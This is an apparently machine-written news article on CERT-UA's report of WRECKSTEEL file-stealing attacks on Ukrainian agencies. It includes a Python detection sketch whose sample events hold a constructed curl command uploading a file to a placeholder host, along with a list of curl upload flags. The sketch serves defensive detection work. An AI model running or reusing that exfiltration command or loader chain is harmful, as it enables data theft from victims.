Ethical Hacking News
CERT-UA reports three cyberattacks using WRECKSTEEL malware that targeted Ukrainian agencies and critical infrastructure in March 2025. The attacks were aimed at collecting and stealing information from computers using appropriate software tools.
The Computer Emergency Response Team (CERT-UA) of Ukraine recently reported three cyberattacks targeting Ukrainian agencies and critical infrastructure in March 2025. The attacks used WRECKSTEEL malware to steal files, with versions available in VBScript and PowerShell. The threat actor has been using compromised accounts to send emails with links leading to VBScript loaders that download PowerShell scripts. The attackers have also used NSIS installers with decoy files and IrfanView. The attackers are evolving their tactics: from 2025 onwards, the screenshot functionality is powered by PowerShell. The malware targets a range of file types, suggesting a desire to steal sensitive information and disrupt critical infrastructure. Organizations must review their security protocols, implement robust cybersecurity measures, and train employees on cyber safety best practices to prevent similar attacks.
CERT-UA, the Computer Emergency Response Team of Ukraine, recently reported three cyberattacks targeting Ukrainian agencies and critical infrastructure in March 2025. The attacks were aimed at collecting and stealing information from computers using appropriate software tools.
The Ukrainian government's computer emergency response team, CERT-UA, has been taking systematic measures to accumulate and analyze data on cyber incidents in order to provide up-to-date information on cyber threats. As part of this effort, the team reported the three cyberattacks that occurred in March 2025. According to the report, the attacks were carried out using WRECKSTEEL malware, which is a primary tool used for stealing files.
The WRECKSTEEL malware has versions in VBScript and PowerShell, and it is not persistent. Because the malware does not persist on the system, any signs of an attack should be reported to CERT-UA immediately so that cyber protection measures can be taken promptly. The report includes indicators of compromise (IoCs) that can help identify and mitigate the threat.
Since fall 2024, a threat actor has been using compromised accounts to send emails with links leading to VBScript loaders that download PowerShell scripts. These scripts search for sensitive files and take screenshots for exfiltration via cURL. The attackers have also used NSIS installers with decoy files and IrfanView.
Notably, from 2025 onwards, the screenshot functionality has shifted to being powered by PowerShell. This change indicates that the threat actor is evolving its tactics and using more sophisticated tools to evade detection.
The malware targets file types such as .doc, .pdf, .xls, .png, and more. The use of WRECKSTEEL malware and other techniques suggests that the attackers are seeking to steal sensitive information and disrupt critical infrastructure.
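The chain described above (a VBScript loader that starts PowerShell, which then exfiltrates via cURL) leaves a recognizable process lineage in endpoint logs. The following is an added detection sketch, not code from CERT-UA or from this article; the event fields, sample events, and the list of cURL upload flags are assumptions made for illustration.

```python
import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # Windows Script Host (runs VBScript)
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Assumption: curl options commonly used to send files; the report names none.
UPLOAD_FLAGS = {"-F", "--form", "-T", "--upload-file", "--data-binary"}

# Constructed process-creation events (shape loosely follows Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": "wscript.exe sample.vbs"},
    {"pid": 300, "ppid": 200, "cmd": "powershell.exe -File sample.ps1",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\curl.exe",
     "cmd": "curl.exe -F file=@report.pdf https://example.invalid/upload"},
    # Benign look-alike: an interactive PowerShell session fetching a file.
    {"pid": 500, "ppid": 100, "cmd": "powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\curl.exe",
     "cmd": "curl.exe https://example.invalid/readme.txt"},
]

def name(image):
    return ntpath.basename(image).lower()

def ancestors(pid, by_pid):
    """Yield parent, grandparent, ...; stop at an unknown parent or a PID loop."""
    seen, ev = {pid}, by_pid.get(pid)
    while ev and ev["ppid"] in by_pid and ev["ppid"] not in seen:
        seen.add(ev["ppid"])
        ev = by_pid[ev["ppid"]]
        yield ev

def find_exfil_chains(events):
    """Flag curl.exe whose lineage is script host -> PowerShell -> curl."""
    # Real telemetry should key on a process GUID, since PIDs are reused.
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if name(e["image"]) != "curl.exe":
            continue
        chain = [name(a["image"]) for a in ancestors(e["pid"], by_pid)]
        ps = next((i for i, n in enumerate(chain) if n in POWERSHELL), None)
        if ps is None or not any(n in SCRIPT_HOSTS for n in chain[ps + 1:]):
            continue
        upload = any(tok in UPLOAD_FLAGS for tok in e["cmd"].split())
        hits.append({"pid": e["pid"], "chain": ["curl.exe"] + chain, "upload_flag": upload})
    return hits
```

The lineage match is the primary signal; the upload-flag field only helps triage, since command-line options can vary.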
CERT-UA's report highlights the importance of vigilance and cooperation in combating cyber threats. It also underscores the need for organizations to stay informed about emerging threats and take proactive measures to protect themselves.
In light of this report, it is essential for organizations to review their security protocols and ensure that they are taking all necessary steps to prevent similar attacks. This includes implementing robust cybersecurity measures, conducting regular vulnerability assessments, and training employees on cyber safety best practices.
Furthermore, the report serves as a reminder of the ongoing threat landscape and the need for continuous monitoring and improvement of cybersecurity defenses. By staying informed about emerging threats and taking proactive steps to protect themselves, organizations can reduce their risk exposure and minimize the impact of potential cyberattacks.
In conclusion, CERT-UA's report on WRECKSTEEL malware attacks highlights the growing threat of cybercrime in Ukraine and beyond. The use of sophisticated tools and techniques by attackers underscores the importance of vigilance and cooperation in combating these threats. By staying informed and taking proactive measures to protect themselves, organizations can reduce their risk exposure and minimize the impact of potential cyberattacks.
Related Information:
https://www.ethicalhackingnews.com/articles/CERT-UA-Reports-WRECKSTEEL-Malware-Attacks-on-Ukrainian-Agencies-and-Critical-Infrastructure-ehn.shtml
Published: Fri Apr 4 06:12:55 2025 by llama3.2 3B Q4_K_M